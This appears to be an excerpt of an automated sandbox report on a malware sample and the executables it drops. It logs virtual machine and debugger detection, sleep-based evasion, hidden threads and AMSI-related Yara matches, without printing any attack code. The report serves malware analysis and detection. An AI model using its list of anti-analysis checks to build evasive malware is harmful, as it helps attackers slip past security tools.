                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: Macromedia.com, 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 2C60000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 2D90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 4D90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 1960000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 3280000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 5280000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11E0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C60000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A10000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 32E0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3470000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5470000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXECode function: 11_2_053002EA rdtsc 11_2_053002EA
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9BD5A sldt word ptr [eax+00000070h]15_3_00B9BD5A
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread delayed: delay time: 600000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread delayed: delay time: 600000
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9912
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9958
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 461
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 4871
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 3431
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9950
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeAPI coverage: 3.4 %
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2808Thread sleep count: 35 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2808Thread sleep time: -70035s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3604Thread sleep count: 32 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3604Thread sleep time: -64032s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep count: 54 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep time: -108054s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6312Thread sleep count: 461 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6312Thread sleep time: -13830000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916Thread sleep count: 45 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916Thread sleep time: -90045s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep count: 48 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep time: -96048s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2844Thread sleep count: 38 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2844Thread sleep time: -76038s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep count: 64 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep time: -128064s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep count: 4871 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep time: -9746871s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep count: 3431 > 30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep time: -6865431s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe TID: 5248Thread sleep time: -34017s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe TID: 4696Thread sleep time: -210000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 167 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 170 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 156 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 176 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 166 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 235 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 297 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 67 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 224 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 31 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 137 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 135 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep time: -600000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 1196Thread sleep count: 69 > 30
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com TID: 5168Thread sleep count: 69 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe TID: 4220Thread sleep time: -120000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe TID: 7872Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe TID: 6572Thread sleep time: -60000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe TID: 6572Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4752Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1396Thread sleep count: 9950 > 30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 159 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 161 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 192 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 265 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 276 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 173 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 272 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 177 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 179 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 136 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 33 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep time: -600000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: PHYSICALDRIVE0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: unknown FullSizeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: unknown FullSizeInformation
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009CDBBE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099C2A2 FindFirstFileExW,0_2_0099C2A2
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D68EE FindFirstFileW,FindClose,0_2_009D68EE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009D698F
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD076
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD3A9
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D9642
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D979D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009D9B2B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009D5C97
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread delayed: delay time: 600000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread delayed: delay time: 600000
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: skotes.exe, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmp, 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmp, c7f37422c5.exe, 00000032.00000002.22773560606.00000000005F6000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: f891ed3167.exe, 00000026.00000002.22707606708.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@TA
                                Source: MSBuild.exe, 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                                Source: powershell.exe, 00000006.00000002.22121335248.00000000072A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22449084177.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE, 0000000B.00000002.22146066632.000000000061B000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000C.00000002.22160600103.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000000D.00000002.22161270732.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmp, 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmp, c7f37422c5.exe, 00000032.00000002.22773560606.00000000005F6000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: c7f37422c5.exe, 00000032.00000002.22782484932.00000000053C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                                Source: Macromedia.com, 0000001D.00000002.22806442878.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22792686507.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22808633872.000000000137A000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799902757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000002.22811887854.000000000137C000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22739302143.0000000001371000.00000004.00000020.00020000.00000000.sdmp, 33c3d7c7bd.exe, 00000023.00000002.22880957255.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328722725.0000000005110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESystem information queried: ModuleInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: CodeIntegrityInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: CodeIntegrityInformation
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: SIWVID
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Code function: 11_2_053002EA rdtsc 11_2_053002EA
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009DEAA2 BlockInput,0_2_009DEAA2
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00992622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992622
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00984CE8 mov eax, dword ptr fs:[00000030h]0_2_00984CE8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_0070652B mov eax, dword ptr fs:[00000030h]14_2_0070652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_0070A302 mov eax, dword ptr fs:[00000030h]14_2_0070A302
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009C0B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00992622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992622
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0098083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0098083F
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009809D5 SetUnhandledExceptionFilter,0_2_009809D5
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00980C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00980C21
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi32_824.amsi.csv, type: OTHER
Source: Yara match | File source: amsi64_6476.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 7188, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 824, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
